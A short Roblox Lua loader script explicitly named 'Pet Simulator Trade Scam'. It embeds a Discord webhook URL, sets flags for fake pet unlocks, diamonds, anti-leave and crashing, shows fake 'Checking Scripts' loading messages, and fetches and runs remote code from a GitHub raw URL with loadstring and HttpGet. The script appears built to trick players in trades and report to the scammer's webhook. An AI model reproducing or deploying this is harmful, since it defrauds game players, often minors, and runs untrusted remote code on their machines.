Username = "VOID_open"
WebHook = "https://discord.com/api/webhooks/1094301025109823760/CP84i7Vomz7DG5WNQP4MYTilNzvCuVF63wNb_bmv6w2X3dvAkGsvjuxAsPeUQH_AnzxE"

_G.CustomScriptName = "Pet Simulator Trade Scam"
_G.UnlockPets = true
_G.AntiLeave = true
_G.Diamonds = 50000
_G.Crash = true
_G.Text1 = "Script Loaded..."
_G.Text2 = "Waiting for Script"
_G.Text3 = "Checking Scripts..."
_G.Text4 = "Starting Scripts..."

loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))()
